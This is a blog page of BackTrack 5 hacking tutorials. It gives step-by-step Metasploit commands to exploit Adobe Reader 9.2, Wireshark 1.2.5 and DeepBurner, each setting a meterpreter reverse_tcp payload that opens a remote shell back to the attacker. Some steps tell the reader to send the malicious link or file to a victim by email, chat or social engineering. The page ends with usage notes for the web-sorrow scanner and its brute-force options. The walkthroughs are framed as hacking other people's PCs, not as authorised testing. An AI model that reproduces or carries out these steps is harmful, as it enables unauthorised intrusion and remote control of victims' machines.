Raj Chandel's Blog
BackTrack 5 Tutorials
Hack any PC in LAN using Adobe Doc.media.newPlayer Use After Free Vulnerability
011 months ago
This module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat Professional versions up to and including 9.2.
Exploit Targets
Adobe Reader 9.2
Windows XP SP2
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/browser/adobe_media_newplayer
Msf exploit (adobe_media_newplayer)>set payload windows/meterpreter/reverse_tcp
Msf exploit (adobe_media_newplayer)>set lhost 192.168.1.2 (IP of Local Host)
Msf exploit (adobe_media_newplayer)>set srvhost 192.168.1.2 (This must be an address on the local machine)
Msf exploit (adobe_media_newplayer)>set uripath adobemediaplayer(The Url to use for this exploit)
Msf exploit (adobe_media_newplayer)>exploit
Now an URL you should give to your victim http://192.168.1.2:8080/adobemediaplayer
Send the link of the server to the victim via chat or email or any social engineering technique.
Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
Hack PC in LAN using Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow
011 months ago
The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer overflow. This bug found and reported by babi. This particular exploit targets the dissect_getaddrsbyname_request function. Several other functions also contain potentially exploitable stack-based buffer overflows. The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents exploitation via the return address on the stack. Sending a larger string allows exploitation using the SEH bypass method. However, this packet will usually get fragmented, which may cause additional complications. NOTE: The vulnerable code is reached only when the packet dissection is rendered. If the packet is fragmented, all fragments must be captured and reassembled to exploit this issue
Exploit Targets
Wireshark 1.2.5
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/multi/misc/wireshark_lwres_getaddrbyname
Msf exploit (wireshark_lwres_getaddrbyname)>set payload windows/meterpreter/reverse_tcp
Msf exploit (wireshark_lwres_getaddrbyname)>set lhost 192.168.1.2 (IP of Local Host)
Msf exploit (wireshark_lwres_getaddrbyname)>set rhost 192.168.1.56 (IP of Remote Host)
Msf exploit (wireshark_lwres_getaddrbyname)>set target 4
Msf exploit (wireshark_lwres_getaddrbyname)>exploit
Before running the exploit command, let say that the attacker now still collecting data using their Wireshark tool like the picture below.
Hack Remote Windows PC with AstonSoft DeepBurner (DBR File) Path Buffer Overflow
011 months ago
This module exploits a stack-based buffer overflow in versions 1.9.0.228, 1.8.0, and possibly other versions of AstonSoft’s DeepBurner (Pro, Lite, etc). An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded DBR file within a browser, since the DBR extention is registered to DeepBurner..
Exploit Targets
AstonSoft’s DeepBurner 1.9.0.228
Windows XP SP 2
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/fileformat/deepburner_path
Msf exploit (deepburner_path)>set payload windows/meterpreter/reverse_tcp
Msf exploit (deepburner_path)>set lhost 192.168.1.2 (IP of Local Host)
Msf exploit (deepburner_path)>exploit
After we successfully generate the malicious dbr File, it will stored on your local computer
/root/.msf4/local/msf.dbr
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2
exploit
Now send your msf.dbr files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.
web-sorrow – A Remote Web Scanner for Version Detection, Misconfiguration, and Server Enumeration
011 months ago
web-sorrow is a PERL based tool used for checking a Web server for misconfiguration, version detection, enumeration, and server information. It is NOT a vulnerability scanner, inspection proxy, DDoS tool or an exploitation framework.
Some features of web-sorrow are:
- CMS (Content Management System) detection
- Port scanning
- Login page scanning
- Proxy support
- Error bagging
To download the latest version click here and unzip it,
Unzip Wsorrow_v1.3.6.zip
To run the script runs this command:
perl Wsorrow.pl
Current functionality:
-S – stands for standard. a set of Standard tests and includes: indexing of directories testing, banner grabbing, language detection (should be obvious), robots.txt, and 200 response testing (some servers send a 200 ok for every req)
-auth – looks for login pages with a list of some of the most common login files and dirs and admin consoles. don’t need to be very big list of URLs because what else are going to name it? notAlogin.php???
-Cp – scan with a huge list of plugins dirs. the list is a bit old (2010)
-I – searches the responses for interesting strings
-Ws – looks for web services such as hosting provider, blogging services, favicon fingerprinting, and cms version info
-Fd – look for generally things people don’t want you to see. The list is generated form a TON of robot.txt so whatever it finds should be interesting.
-Fp – Fingerprint server based on behavior (unrefined as of yet)
-ninja – A light weight and undetectable scan that uses bits and peaces from other scans
-Sd – Bruteforce Sub Domains
-Db – Bruteforce Directories with the big dirbuster Database
-ua – use a custom UserAgent. PUT UA IN QUOTES if theres spaces
-proxy – send all http reqs via a proxy. example: 255.255.255.254:8080
-e – run all the scans in the tool
web-sorrow also has false positives checking on most of it’s requests (it pretty accurate but not perfect)
Example of usage
basic: perl Wsorrow.pl -host scanme.nmap.org -S
look for login pages: perl Wsorrow.pl -host 192.168.1.1 -auth
CMS intense scan: perl Wsorrow.pl -host 192.168.1.1 -Ws -Cp all -I
most intense scan possible: perl Wsorrow.pl -host 192.168.1.1 -e -ua “I come in peace”
Google+
